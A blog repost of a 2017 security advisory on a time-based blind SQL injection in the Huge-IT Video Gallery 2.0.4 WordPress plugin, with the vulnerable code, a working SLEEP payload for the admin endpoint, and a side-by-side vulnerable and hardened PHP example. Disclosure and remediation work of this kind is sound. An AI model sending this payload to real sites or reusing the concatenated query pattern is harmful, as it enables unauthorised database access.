WordPress Huge-IT Video Gallery 2.0.4 SQL Injection

Advisory ID: DC-2017-01-009
Vulnerability type: SQL injection

Vulnerable Function:    $wpdb->get_var( $query );
Vulnerable Variable:    $_POST['cat_search']
Vulnerable URL:         http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
File:                   gallery-video\includes\admin\class-gallery-video-galleries.php
---------
107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
...
118       $where .= " AND sl_width=" . $cat_id;
...
127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where;
128    $total = $wpdb->get_var( $query );
---------

Why this is injectable: sanitize_text_field() strips tags, invalid UTF-8 and stray whitespace, but it performs no SQL escaping. The value is then concatenated unquoted into a numeric comparison (sl_width=), so there is no quote to break out of; everything after the first token is parsed as SQL. The time-based body above makes the blind injection observable as a roughly five-second delay in the response. Note that the endpoint lives under wp-admin/, so reaching it requires a session that can open that plugin menu page; the advisory does not state which capability is checked.
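The following is an added example, not the plugin's code and not part of the DefenseCode advisory. It reproduces the unsafe query construction from the excerpt above (lines 108 to 117 and 119 to 126 are not on the page, so the initial "WHERE 1=1" and the empty-value check are assumptions) and places a hardened version beside it that binds the value through $wpdb->prepare(). The excerpt compares sl_width unquoted, so the example treats it as an integer column; if it were a string column, %s would be the placeholder and absint() would not apply.

```php
<?php
// Added example (assumes a WordPress context where $wpdb and the helpers
// sanitize_text_field(), absint() and $wpdb->prepare() are loaded).

// Vulnerable: mirrors lines 107/118/127/128 of the advisory excerpt.
// sanitize_text_field() leaves
//   "DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)"
// untouched, and the string is concatenated, unquoted, into the WHERE
// clause, so MySQL parses it as SQL rather than as a value.
function huge_it_count_galleries_vulnerable( array $post ) {
    global $wpdb;
    $cat_id = sanitize_text_field( $post['cat_search'] );
    $where  = ' WHERE 1=1';                   // assumed prefix, not on the page
    if ( '' !== $cat_id ) {
        $where .= ' AND sl_width=' . $cat_id; // line 118: raw concatenation
    }
    $query = 'SELECT COUNT(*) FROM ' . $wpdb->prefix . 'huge_it_videogallery_galleries' . $where;
    return (int) $wpdb->get_var( $query );
}

// Hardened: the comparison is numeric, so coerce the input with absint()
// and bind it with a %d placeholder. A payload such as the advisory's body
// collapses to 0 and never reaches the SQL parser as syntax. The table name
// is built from the trusted $wpdb->prefix and is not user-controlled.
function huge_it_count_galleries_safe( array $post ) {
    global $wpdb;
    $table = $wpdb->prefix . 'huge_it_videogallery_galleries';

    if ( ! isset( $post['cat_search'] ) || '' === $post['cat_search'] ) {
        // No filter supplied: count every gallery (assumed original behaviour).
        return (int) $wpdb->get_var( "SELECT COUNT(*) FROM {$table}" );
    }

    $cat_id = absint( $post['cat_search'] );
    $query  = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$table} WHERE sl_width = %d",
        $cat_id
    );
    return (int) $wpdb->get_var( $query );
}
```

The hardened function only closes the injection; it does not add a capability or nonce check for the admin page, which the advisory does not describe and which a real fix should review separately.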

Permalink: https://www.unhonker.com/bug/1993.html | 90's Blog | focused on network and information security

This entry was posted by unhonker on 30 May 2017 in the 漏洞公布 (Vulnerability Disclosures) category. You may comment on it and quote it on your own site or blog as long as the original URL and author are kept.
